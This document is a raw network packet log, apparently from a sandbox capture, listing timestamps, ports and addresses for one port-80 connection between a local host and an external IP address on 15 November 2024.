Nov 15, 2024 14:09:10.704652071 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:10.704668045 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:10.704701900 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:10.704950094 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.704966068 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.704998970 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:10.705014944 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:10.705441952 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.705466986 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.705482960 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.705492020 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:10.705498934 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.705504894 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:10.705517054 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.705523968 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:10.705532074 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.705547094 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:10.705550909 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.705560923 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:10.705586910 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:10.705605030 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:10.706397057 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.706453085 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:10.818375111 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.818515062 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:10.818970919 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.819087982 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:10.865202904 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.865223885 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.865235090 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.865365982 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:10.865365982 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:10.865642071 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.865650892 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.865660906 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.865672112 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.865758896 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.865767956 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.865778923 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.865803003 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:10.865803003 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:10.865803003 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:10.865849972 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:10.865856886 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.865865946 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.865905046 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:10.865937948 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.865962982 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.865983009 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:10.866010904 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:10.866169930 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.866180897 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.866189957 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.866216898 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:10.866240025 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:10.866434097 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.866444111 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.866452932 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.866462946 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.866472960 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.866483927 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.866494894 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:10.866519928 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:10.866543055 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:10.866961002 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.866971970 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.866981030 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.866993904 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.867014885 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:10.867042065 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:10.867208004 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.867218971 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.867228985 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.867239952 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.867255926 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:10.867283106 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:10.867563009 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.867573023 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.867582083 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.867619038 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:10.867635965 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:10.867856979 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.867866993 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.867876053 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.867886066 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.867894888 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.867903948 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:10.867904902 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.867917061 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.867924929 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.867930889 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:10.867954969 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:10.867973089 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:10.868452072 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.868463039 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.868472099 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.868480921 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.868485928 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.868495941 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.868504047 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.868510008 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:10.868511915 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.868530989 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:10.868560076 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:10.869122982 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.869133949 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.869143963 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.869153976 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.869165897 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.869169950 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:10.869178057 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.869189024 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.869201899 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.869204998 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:10.869235039 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:10.869251013 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:10.869683027 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.869693995 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.869740963 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:10.870593071 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.870604038 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.870614052 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.870656013 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:10.870671988 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:10.870697021 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.870738983 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:10.870773077 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.870822906 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:10.870897055 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.870908976 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.870918989 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.870945930 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:10.870974064 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:10.871203899 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.871215105 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.871225119 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.871234894 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.871246099 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.871257067 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.871262074 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:10.871268034 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.871274948 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:10.871301889 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:10.871325970 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:10.871716976 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.871769905 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:10.871854067 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.871865988 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.871911049 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:10.872029066 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.872040033 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.872050047 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.872061968 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.872107983 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:10.872133017 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:10.872469902 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.872483015 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.872493982 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.872504950 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.872518063 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.872529984 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.872528076 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:10.872550964 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:10.872571945 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:10.872853994 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.872900963 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:10.872919083 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.872931957 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.872966051 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:10.872981071 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:10.873094082 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.873106003 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.873151064 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:10.936780930 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.936846018 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:10.937390089 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:10.937458992 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.029485941 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.029506922 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.029531002 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.029546022 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.029560089 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.029576063 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.029629946 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.029674053 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.029690981 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.029706955 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.029851913 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.029875994 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.029891968 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.029906988 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.029920101 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.029922962 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.029921055 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.029938936 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.029958963 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.029968977 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.030004025 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.030488968 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.030503988 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.030519009 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.030534983 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.030550957 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.030551910 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.030567884 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.030585051 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.030596018 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.030601025 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.030618906 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.030641079 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.030668974 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.031200886 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.031215906 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.031230927 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.031248093 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.031274080 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.031306028 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.031518936 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.031533957 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.031553984 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.031578064 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.031593084 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.031595945 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.031609058 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.031610012 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.031625986 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.031644106 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.031651020 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.031660080 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.031675100 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.031691074 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.031716108 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.032526016 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.032542944 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.032556057 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.032572031 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.032588959 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.032598972 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.032604933 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.032623053 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.032630920 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.032639980 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.032660007 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.032696009 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.033207893 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.033224106 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.033238888 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.033253908 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.033268929 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.033272028 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.033286095 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.033301115 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.033305883 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.033318043 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.033319950 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.033334970 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.033351898 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.033361912 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.033417940 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.034204006 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.034220934 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.034235954 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.034252882 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.034257889 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.034269094 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.034284115 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.034287930 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.034301043 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.034310102 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.034323931 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.034327984 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.034341097 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.034356117 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.034427881 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.034427881 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.035110950 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.035126925 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.035142899 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.035159111 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.035173893 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.035180092 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.035191059 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.035207033 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.035214901 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.035223961 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.035237074 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.035243988 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.035253048 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.035269022 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.035275936 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.035319090 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.036086082 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.036103010 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.036117077 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.036135912 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.036154985 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.036164999 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.036180019 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.036194086 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.036195993 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.036214113 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.036218882 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.036245108 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.036247015 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.036250114 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.036251068 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.036426067 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.037012100 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.037029028 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.037044048 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.037060022 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.037075996 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.037084103 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.037091970 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.037107944 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.037122965 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.037131071 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.037137985 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.037154913 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.037161112 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.037170887 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.037189007 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.037192106 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.037210941 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.037234068 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.037822962 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.037838936 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.037853956 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.037868977 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.037883997 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.037899971 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.037903070 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.037915945 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.037936926 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.037946939 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.037951946 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.037969112 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.037974119 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:11.037985086 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:11.037997961 CET	49730	80	192.168.2.4	185.215.113.206
